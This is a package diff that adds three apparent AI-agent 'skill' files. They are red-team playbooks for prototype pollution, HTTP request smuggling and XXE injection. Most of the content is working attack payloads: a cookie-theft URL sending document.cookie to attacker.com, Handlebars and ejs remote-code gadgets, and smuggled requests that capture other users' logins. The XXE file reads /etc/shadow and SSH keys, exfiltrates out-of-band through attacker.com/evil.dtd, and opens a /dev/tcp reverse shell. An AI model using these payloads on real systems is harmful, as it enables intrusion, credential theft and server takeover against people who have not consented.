rtexit-method 0.1.8 → 0.1.9

package/packaged-assets/.agents/skills/rt-prototype-pollution/SKILL.md

@@ -0,0 +1,154 @@
+---
+name: rt-prototype-pollution
+description: "Prototype pollution attack skill for authorized engagements. Client-side prototype pollution to DOM XSS and cookie theft, server-side prototype pollution in Node.js to RCE, gadget chains for PP escalation, AST injection via prototype pollution, property injection in lodash/merge functions, and automated detection with PPScan. Use when testing JavaScript applications (both browser-side and Node.js server-side)."
+---
+
+# rt-prototype-pollution — Prototype Pollution
+
+## Overview
+
+JavaScript's prototype chain allows every object to inherit properties from its prototype. Prototype pollution injects properties into `Object.prototype` — affecting ALL objects in the application. Client-side: leads to DOM XSS. Server-side: leads to RCE, authentication bypass, and privilege escalation.
+
+---
+
+## Phase 1 — Detection
+
+```javascript
+// Client-side detection in browser console
+// Inject test property into Object.prototype
+?__proto__[testprop]=testvalue
+// Or in JSON body: {"__proto__": {"testprop": "testvalue"}}
+
+// Check if it worked
+window.testprop  // Should be "testvalue" if polluted
+({}).testprop    // Any empty object should have it
+
+// Server-side detection
+// Send request with __proto__ in JSON
+fetch('/api/user/update', {
+    method: 'POST',
+    body: JSON.stringify({"__proto__": {"polluted": true}})
+})
+// If server responds differently → server-side PP
+
+// Automated: PPScan
+npm install -g ppscan
+ppscan --url https://target.com
+```
+
+---
+
+## Phase 2 — Client-Side PP to DOM XSS
+
+```bash
+# Inject via URL query parameter
+https://target.com/?__proto__[innerHTML]=<img src=x onerror=alert(1)>
+https://target.com/?__proto__[src]=//attacker.com/evil.js
+
+# Inject via JSON body parameter
+{"username": "test", "__proto__": {"isAdmin": true}}
+{"name": "x", "constructor": {"prototype": {"isAdmin": true}}}
+{"name": "x", "__proto__.__proto__": {"isAdmin": true}}
+
+# Common gadgets (properties that cause XSS when polluted)
+__proto__[innerHTML]       → sets innerHTML of elements
+__proto__[src]             → sets src of script/img elements
+__proto__[href]            → sets href causing XSS
+__proto__[transport_url]   → jQuery JSONP
+__proto__[sequence]        → DOMPurify bypass
+__proto__[NODE_NAME]       → specific framework gadgets
+
+# PayloadsAllTheThings PP gadgets
+# https://github.com/HoLyVieR/prototype-pollution-nsec18
+
+# Exploit: steal cookies via polluted property
+https://target.com/?__proto__[innerHTML]=<script>fetch('https://attacker.com?c='+document.cookie)</script>
+```
+
+---
+
+## Phase 3 — Server-Side PP to RCE
+
+```javascript
+// Node.js server-side prototype pollution → RCE
+
+// Lodash merge (CVE-2019-10744)
+const _ = require('lodash');
+_.merge({}, JSON.parse('{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}'));
+// Pollutes process.mainModule.require or shell property
+
+// express-fileupload PP (CVE-2020-7699)
+// POST with file upload + __proto__ in field name → pollutes globally
+
+// Handlebars template injection via PP (CVE-2019-19919)
+// Pollute __proto__.pendingContent → template execution
+const payload = '{"__proto__": {"pendingContent": "{{#with \"s\" as |string|}}{{#with \"e\"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub \"constructor\")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push \"return require(\'child_process\').execSync(\'id\').toString()\"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}"}}';
+
+// Detect via spawn/exec pollution
+// If shell property polluted → child_process.exec uses it
+const {exec} = require('child_process');
+exec('id');  // If __proto__.shell='node' → executes node instead
+```
+
+---
+
+## Phase 4 — Escalation via Gadgets
+
+```javascript
+// Property injection gadgets for various frameworks
+
+// Express.js
+__proto__[admin] = true          // Bypass auth checks: if(req.user.admin)
+__proto__[authorized] = true
+__proto__[role] = "admin"
+
+// ejs template RCE gadget
+__proto__[outputFunctionName] = "x; process.mainModule.require('child_process').execSync('id'); //"
+
+// Pug template
+__proto__[compileDebug] = 1
+__proto__[self] = 1
+
+// Finding gadgets manually
+// Search codebase for dangerous property accesses that could be polluted:
+grep -r "opts\.\|options\.\|config\." src/ | grep -v "==" | grep -v "!=="
+# Properties read from objects without hasOwnProperty check = potential gadgets
+```
+
+---
+
+## Phase 5 — Fix Bypass Techniques
+
+```javascript
+// App uses Object.create(null) to avoid PP? Try:
+{"constructor": {"prototype": {"polluted": true}}}
+
+// App filters __proto__? Use:
+{"constructor": {"prototype": {"polluted": true}}}
+// or URL encoded: %5F%5Fproto%5F%5F
+
+// Deep merge bypass
+{"a": {"__proto__": {"polluted": true}}}
+// Some merge functions recurse → pollutes at depth
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** DOM XSS via URL-based PP · isAdmin bypass via polluted property
+
+**INTERMEDIATE:** PP gadget research in target's framework · Server-side PP detection
+
+**ADVANCED:** ejs/Pug RCE via PP gadgets · Lodash merge exploitation · PP chain to full server compromise
+
+**EXPERT:** Custom gadget discovery · PP + deserialization chains · 0-day PP in popular frameworks
+
+---
+
+## References
+
+- PortSwigger PP: https://portswigger.net/web-security/prototype-pollution
+- PP gadgets research: https://github.com/BlackFan/client-side-prototype-pollution
+- Server-side PP: https://portswigger.net/research/server-side-prototype-pollution
+- MITRE T1059.007: https://attack.mitre.org/techniques/T1059/007/

package/packaged-assets/.agents/skills/rt-request-smuggling/SKILL.md

@@ -0,0 +1,187 @@
+---
+name: rt-request-smuggling
+description: "HTTP Request Smuggling attack skill for authorized engagements. CL.TE and TE.CL desync attacks, HTTP/2 downgrade smuggling (H2.CL, H2.TE), request queue poisoning for account takeover, smuggling to bypass front-end security controls, capturing other users' requests, response queue poisoning, and Burp Suite smuggling detection. Use when testing applications behind reverse proxies, load balancers, or CDNs."
+---
+
+# rt-request-smuggling — HTTP Request Smuggling
+
+## Overview
+
+HTTP Request Smuggling exploits disagreements between front-end (proxy/CDN) and back-end servers about where one HTTP request ends and the next begins. The front-end sees one request; the back-end sees two — the second being a "smuggled" request that can poison the queue, hijack other users' requests, or bypass security controls.
+
+**Conditions:** Front-end + back-end server, both parsing HTTP differently (Content-Length vs Transfer-Encoding).
+
+---
+
+## Phase 1 — Detection
+
+```http
+# CL.TE detection — front-end uses Content-Length, back-end uses TE
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 6
+Transfer-Encoding: chunked
+
+0
+
+X
+```
+
+```bash
+# Burp Suite — HTTP Request Smuggler extension (BApp Store)
+# Scanner → Scan → HTTP Request Smuggling
+
+# Manual timing-based detection
+# If response takes ~10s with no timeout set → backend stalled on incomplete chunk → CL.TE vulnerable
+
+# smuggler.py — automated detection
+git clone https://github.com/defparam/smuggler
+python3 smuggler.py -u https://target.com/
+```
+
+---
+
+## Phase 2 — CL.TE (Front-end: Content-Length, Back-end: Transfer-Encoding)
+
+```http
+# Smuggled prefix poisoning
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 13
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+```
+
+```http
+# Capture next user's request (account takeover)
+POST / HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 130
+Transfer-Encoding: chunked
+
+0
+
+POST /login HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 100
+
+username=captured_
+# Next user's request body appends here → steals their credentials
+```
+
+---
+
+## Phase 3 — TE.CL (Front-end: Transfer-Encoding, Back-end: Content-Length)
+
+```http
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+5e
+POST /admin HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+admin=true&x=
+0
+```
+
+---
+
+## Phase 4 — H2.CL / H2.TE (HTTP/2 Downgrade Smuggling)
+
+```http
+# HTTP/2 requests downgraded to HTTP/1.1 at the proxy
+# Inject Content-Length or Transfer-Encoding in HTTP/2 headers
+
+# H2.CL — inject Content-Length in HTTP/2
+:method POST
+:path /
+:authority target.com
+content-type application/x-www-form-urlencoded
+content-length 0
+
+# H2.TE — inject Transfer-Encoding in HTTP/2 pseudo-header
+:method POST
+transfer-encoding chunked
+# Body follows with chunked encoding
+```
+
+```bash
+# Burp Suite — HTTP/2 smuggling
+# Repeater → toggle HTTP/2 → inject headers manually
+# Inspector pane → add custom headers without content-length auto-calculation
+```
+
+---
+
+## Phase 5 — Security Control Bypass
+
+```http
+# Bypass front-end IP restriction
+# Front-end blocks /admin from external IPs
+# Smuggle request to appear as internal
+
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 116
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: target.com
+X-Forwarded-For: 127.0.0.1
+X-Original-URL: /admin
+Content-Length: 10
+
+x=1
+```
+
+---
+
+## Phase 6 — Response Queue Poisoning
+
+```http
+# Poison response queue → steal other users' responses
+# Works when backend uses persistent connections
+
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 43
+Transfer-Encoding: chunked
+
+0
+
+GET /admin/delete?user=victim HTTP/1.1
+X: X
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Burp HTTP Request Smuggler extension for automated detection
+
+**INTERMEDIATE:** Manual CL.TE/TE.CL with Burp Repeater · Security control bypass
+
+**ADVANCED:** Request capture for account takeover · H2.CL/H2.TE HTTP/2 smuggling
+
+**EXPERT:** Response queue poisoning · Custom timing-based detection · CDN-specific variants
+
+---
+
+## References
+
+- PortSwigger Research: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
+- PortSwigger Lab: https://portswigger.net/web-security/request-smuggling
+- smuggler.py: https://github.com/defparam/smuggler
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-xxe/SKILL.md

@@ -0,0 +1,181 @@
+---
+name: rt-xxe
+description: "XML External Entity (XXE) injection skill for authorized engagements. Classic XXE for file read, XXE-based SSRF, blind XXE via out-of-band (OOB) DNS/HTTP exfiltration, XXE in file uploads (SVG, DOCX, XLSX), XXE in SOAP/REST APIs, XXE via XInclude, error-based XXE, and XXE to RCE via PHP expect wrapper. Use when any XML input is processed by the application."
+---
+
+# rt-xxe — XML External Entity (XXE) Injection
+
+## Overview
+
+XXE occurs when XML parsers process external entity references in attacker-controlled XML input. Impact ranges from local file disclosure to SSRF to RCE. XXE is commonly found in: XML APIs, file upload endpoints (SVG, DOCX, XLSX), SOAP services, and applications using XML for data exchange.
+
+---
+
+## Phase 1 — Classic XXE (File Read)
+
+```xml
+<!-- Basic XXE — read /etc/passwd -->
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<root><data>&xxe;</data></root>
+
+<!-- Windows paths -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
+<root>&xxe;</root>
+
+<!-- Read sensitive files -->
+file:///etc/passwd
+file:///etc/shadow
+file:///etc/hosts
+file:///proc/self/environ     ← environment variables (may have secrets)
+file:///proc/self/cmdline     ← running process command
+file:///var/www/html/config.php
+file:///app/.env
+file:///home/user/.ssh/id_rsa
+
+<!-- PHP wrapper — base64 encode to avoid XML breakage -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
+<root>&xxe;</root>
+<!-- Decode response: echo "BASE64" | base64 -d -->
+```
+
+---
+
+## Phase 2 — XXE-Based SSRF
+
+```xml
+<!-- Probe internal services via XXE -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
+<root>&xxe;</root>
+<!-- AWS metadata → get IAM credentials -->
+
+<!-- Internal port scan via XXE -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.10.10.1:8080/">]>
+<root>&xxe;</root>
+<!-- Different response/timing for open vs closed ports -->
+```
+
+---
+
+## Phase 3 — Blind XXE (Out-of-Band)
+
+```xml
+<!-- No response reflection → use OOB to exfiltrate -->
+
+<!-- Step 1: Host malicious DTD on attacker server -->
+<!-- attacker.com/evil.dtd: -->
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
+%eval;
+%exfil;
+
+<!-- Step 2: Send XML referencing your DTD -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
+<root>test</root>
+
+<!-- Monitor attacker.com access logs → file contents in URL params -->
+
+<!-- DNS-based blind XXE (firewalled HTTP) -->
+<!ENTITY % xxe SYSTEM "http://UNIQUE_ID.attacker.burpcollaborator.net/">
+
+<!-- Burp Collaborator: detect blind XXE via DNS lookups -->
+```
+
+---
+
+## Phase 4 — XXE in File Uploads
+
+```bash
+# SVG XXE (image upload that parses SVG)
+cat > evil.svg << 'EOF'
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<svg xmlns="http://www.w3.org/2000/svg">
+  <text font-size="15">&xxe;</text>
+</svg>
+EOF
+curl -X POST https://target.com/upload -F "file=@evil.svg"
+
+# DOCX/XLSX XXE (Office documents are ZIP archives containing XML)
+mkdir docx_xxe && cd docx_xxe
+cp legitimate.docx evil.docx
+unzip evil.docx -d evil_extracted/
+# Edit evil_extracted/word/document.xml:
+# Add XXE declaration at top
+zip -r evil.docx evil_extracted/
+curl -X POST https://target.com/upload -F "file=@evil.docx"
+
+# PDF XXE (some PDF parsers)
+cat > evil.pdf << 'EOF'
+%PDF-1.4
+1 0 obj
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
+EOF
+```
+
+---
+
+## Phase 5 — XInclude Attack
+
+```xml
+<!-- When you can't control the DOCTYPE declaration -->
+<!-- XInclude works inside XML document body -->
+<foo xmlns:xi="http://www.w3.org/2001/XInclude">
+  <xi:include parse="text" href="file:///etc/passwd"/>
+</foo>
+```
+
+---
+
+## Phase 6 — Error-Based XXE
+
+```xml
+<!-- Trigger parsing error to exfiltrate in error message -->
+<!DOCTYPE foo [
+  <!ENTITY % file SYSTEM "file:///etc/passwd">
+  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+  %eval;
+  %error;
+]>
+<!-- Error message contains: file not found: /nonexistent/root:x:0:0:root... -->
+```
+
+---
+
+## Phase 7 — XXE to RCE
+
+```xml
+<!-- PHP expect:// wrapper (if expect module loaded) -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
+<root>&xxe;</root>
+<!-- Response: uid=33(www-data) -->
+
+<!-- Escalate to reverse shell -->
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://bash -c 'bash -i >%26 /dev/tcp/ATTACKER/4444 0>%261'">]>
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Classic XXE file read (/etc/passwd) · SOAP/XML API testing · SVG file upload
+
+**INTERMEDIATE:** XXE-based SSRF for cloud metadata · Blind OOB via Burp Collaborator · DOCX/XLSX XXE
+
+**ADVANCED:** Error-based blind XXE · XInclude for restricted contexts · PHP filter chain via XXE
+
+**EXPERT:** XXE to RCE via expect:// · Custom DTD chaining · XXE in binary protocols that embed XML
+
+---
+
+## References
+
+- PortSwigger XXE: https://portswigger.net/web-security/xxe
+- PayloadsAllTheThings XXE: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
+- MITRE T1059: https://attack.mitre.org/techniques/T1059/